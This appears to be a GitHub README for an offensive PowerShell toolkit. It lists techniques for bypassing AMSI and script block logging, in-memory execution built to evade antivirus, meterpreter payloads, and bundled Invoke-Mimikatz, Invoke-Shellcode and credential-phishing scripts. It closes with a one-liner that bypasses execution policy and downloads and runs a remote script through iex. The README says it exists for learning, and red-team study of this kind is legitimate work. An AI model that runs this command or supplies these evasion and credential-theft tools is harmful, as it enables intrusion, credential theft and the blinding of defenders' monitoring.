This repository was created for learning / demonstration purposes and is based on a post by @xpn, more details available here.
The goal is:
- Perform everything in memory without touching the hard disk
- Run well-known scripts without being intercepted by the AV
- Execute payload meterpreter without being intercepted by the AV
- Minimize trace in EventViewer
The main script Setup.ps1 performs the necessary commands for protecting our operational security (not entirely):
- Script block logging bypass by Ryan Cobb (@cobbr_io)
The main script Setup.ps1 plus AMSI-Setup.ps1 performs one of the following AMSI evasion techniques:
- Reflection by Matt Graeber (@mattifestation)
- Patching by Tal Liberman (@Tal_Liberman)
- Erro forcing by Adam Chester (@xpn)
Once the setup phase is over, you can run the console and all its scripts without using any obfuscation technique. In fact, only the commands necessary for AMSI evasion technique are obfuscated. The command necessary for Script block logging bypass are also obfuscated not for evade AMSI but for leave minimum trace on EventViewer.
This repository contains well-known scripts such as Invoke-Mimikatz Invoke-Shellcode Invoke-CrerdentialPhisher that they have been patched or customized for solving issue and easy integration.
To start the console run this line
powershell -Execution bypass "iex((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/b4rtik/PowerTheShell/master/Setup.ps1'))"